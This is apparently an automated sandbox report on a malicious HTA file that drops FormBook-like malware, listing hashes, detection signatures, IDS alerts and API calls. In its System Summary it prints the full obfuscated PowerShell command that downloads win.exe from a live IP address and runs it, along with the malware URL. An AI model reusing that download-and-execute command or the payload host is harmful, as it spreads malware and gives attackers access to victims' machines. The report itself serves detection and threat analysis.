Windows Analysis Report
seemejkiss.hta

Overview

General Information

Sample name: seemejkiss.hta
Analysis ID: 1570657
MD5: 1839f55f0cfed85d442ba37410e344ed
SHA1: 6aa8c00d5a6bac164de92c747ca049a7847b00a4
SHA256: 6af62cafa5b80900dbacfd9425e9f5411a39f0152eb63dfdd093ef229c9b350b
Tags: htauser-abuse_ch
Infos:

Detection

Cobalt Strike, FormBook, HTMLPhisher
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://107.175.113.196/400/win.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\win[1].exe ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Roaming\winnit.exe ReversingLabs: Detection: 58%
Multi AV Scanner detection for submitted file
Source: seemejkiss.hta ReversingLabs: Detection: 15%
Yara detected FormBook
Source: Yara match File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2350161997.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2350750527.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\win[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\winnit.exe Joe Sandbox ML: detected

Phishing
barindex
Yara detected HtmlPhish44
Source: Yara match File source: seemejkiss.hta, type: SAMPLE
Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.pdb source: powershell.exe, 00000003.00000002.2180711036.00000000054E4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: winnit.exe, 00000006.00000003.2185219526.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, winnit.exe, 00000006.00000003.2184427306.0000000003640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2313705453.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2350802126.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2315536638.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2350802126.0000000003B00000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: winnit.exe, 00000006.00000003.2185219526.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, winnit.exe, 00000006.00000003.2184427306.0000000003640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.2313705453.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2350802126.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2315536638.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2350802126.0000000003B00000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B1445A GetFileAttributesW,FindFirstFileW,FindClose, 6_2_00B1445A
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B1C6D1 FindFirstFileW,FindClose, 6_2_00B1C6D1
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B1C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 6_2_00B1C75C
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B1EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00B1EF95
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B1F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00B1F0F2
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B1F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_00B1F3F3
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B137EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00B137EF
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B13B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00B13B12
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B1BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_00B1BCBC

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 107.175.113.196:80 -> 192.168.2.5:49706
Source: Network traffic Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 107.175.113.196:80 -> 192.168.2.5:49706
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 14:47:44 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Wed, 04 Dec 2024 08:38:39 GMTETag: "128400-6286db55d5857"Accept-Ranges: bytesContent-Length: 1213440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 18 15 50 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 a2 09 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 12 00 00 04 00 00 de 42 13 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 88 fb 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 12 00 1c 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 dc 08 00 00 10 00 00 00 de 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 fb 05 00 00 70 0c 00 00 fc 05 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 70 12 00 00 72 00 00 00 12 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49706 -> 107.175.113.196:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /400/win.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 107.175.113.196Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_033E7A18 URLDownloadToFileW, 3_2_033E7A18
Source: global traffic HTTP traffic detected: GET /400/win.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 107.175.113.196Connection: Keep-Alive
Source: powershell.exe, 00000003.00000002.2180711036.00000000054E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://107.175.113.196/400/win.e
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://107.175.113.196/400/win.exe
Source: powershell.exe, 00000003.00000002.2187215317.0000000008892000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.175.113.196/400/win.exeV
Source: powershell.exe, 00000003.00000002.2182576683.000000000612A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.2180711036.00000000050C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2180711036.00000000050C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000003.00000002.2182576683.000000000612A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2182576683.000000000612A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2182576683.000000000612A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2184138928.00000000078B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com32/WindowsPowerShell/v1.0/Modules/UEV/icrosoft.Uev.Commands.dll
Source: powershell.exe, 00000003.00000002.2182576683.000000000612A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B24164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 6_2_00B24164
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B24164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 6_2_00B24164
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B23F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 6_2_00B23F66
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B1001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 6_2_00B1001C
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B3CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 6_2_00B3CABC

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2350161997.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2350750527.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Detected Cobalt Strike Beacon
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))" Jump to behavior
Binary is likely a compiled AutoIt script file
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: This is a third-party compiled AutoIt script. 6_2_00AB3B3A
Source: winnit.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: winnit.exe, 00000006.00000002.2186302265.0000000000B64000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_472efbc9-e
Source: winnit.exe, 00000006.00000002.2186302265.0000000000B64000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_660abace-f
Source: win[1].exe.3.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_98d76c9e-d
